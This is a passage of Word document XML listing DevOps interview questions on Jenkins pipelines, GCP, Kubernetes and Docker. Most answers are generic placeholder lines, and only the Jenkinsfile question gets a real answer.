      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Jenkins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integrate third-party tools like Prisma Cloud, Stream Security, or Datadog into Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is a multi-stage Jenkins pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Jenkins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a multi-stage Jenkins pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Your Jenkins pipeline suddenly starts failing after hundreds of successful builds. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Troubleshooting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Your Jenkins pipeline suddenly starts failing after hundreds of successful builds. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Where do you start troubleshooting—a cloud service, the application, or Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Troubleshooting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Where do you start troubleshooting—a cloud service, the application, or Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Design a complete CI/CD pipeline for a Java microservices application from code merge to production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/System Design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Design a complete CI/CD pipeline for a Java microservices application from code merge to production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Would you use a Scripted Pipeline or Declarative Pipeline? Why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Jenkins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Would you use a Scripted Pipeline or Declarative Pipeline? Why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is a Jenkinsfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Jenkinsfile is a text file, checked into source control alongside the application code, that defines a Jenkins pipeline's stages and steps as code, so the build/test/deploy process is versioned and reviewable like any other code change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Which type of pipeline is called a Jenkinsfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Jenkins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type of pipeline is called a Jenkinsfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you rate yourself in GCP out of 10?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Experience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rate yourself in GCP out of 10?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What are the advantages of Compute Engine over traditional virtual machines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Compute Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Compute Engine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the advantages of Compute Engine over traditional virtual machines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What machine families are available in Compute Engine?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Compute Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Compute Engine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machine families are available in Compute Engine?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. A production VM becomes unreachable. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Troubleshooting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A production VM becomes unreachable. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. If an entire GCP region goes down, what is your disaster recovery strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Disaster Recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Disaster Recovery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an entire GCP region goes down, what is your disaster recovery strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. How would you improve security in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Security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improve security in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. A VM in VPC-A cannot communicate with a VM in VPC-B. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Networking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A VM in VPC-A cannot communicate with a VM in VPC-B. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. CPU utilization is only 20%, but application latency has doubled. How do you investigate it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Performance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CPU utilization is only 20%, but application latency has doubled. How do you investigate it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Compare Cloud Run, GKE, Compute Engine, and App Engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/Architecture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Compare Cloud Run, GKE, Compute Engine, and App Engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. What are the Kubernetes Service types?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Networking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the Kubernetes Service types?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. A Service is not routing traffic to the correct Pod. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Troubleshooting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A Service is not routing traffic to the correct Pod. How do you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. Explain the Kubernetes architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Architecture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the Kubernetes architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. Which components communicate with each other in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Architecture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components communicate with each other in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. Where do ConfigMaps and Secrets fit into the Kubernetes architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Configuration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Where do ConfigMaps and Secrets fit into the Kubernetes architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. What deployment strategies are available in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Deployment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deployment strategies are available in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. Which deployment strategy do you prefer in production and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Deployment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deployment strategy do you prefer in production and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. Explain Horizontal Pod Autoscaler (HPA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Autoscaling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Horizontal Pod Autoscaler (HPA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. Explain Vertical Pod Autoscaler (VPA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Autoscaling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Vertical Pod Autoscaler (VPA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. Pods are getting killed automatically. How do you determine whether it’s OOMKilled, node resource pressure, or another issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Troubleshooting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Pods are getting killed automatically. How do you determine whether it’s OOMKilled, node resource pressure, or another issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. Multiple pods are in CrashLoopBackOff. How do you restore production quickly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Incident Response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Multiple pods are in CrashLoopBackOff. How do you restore production quickly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. Name the common Dockerfile instructions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Dockerfile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Name the common Dockerfile instructions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. How do you scan Docker images for vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Security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scan Docker images for vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. What is a multi-stage Docker build?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Build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a multi-stage Docker build?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. Do Docker containers have separate kernels or do they share the host kernel?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Runtime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 Docker containers have separate kernels or do they share the host kernel?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. How does a container communicate with the Linux kernel?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
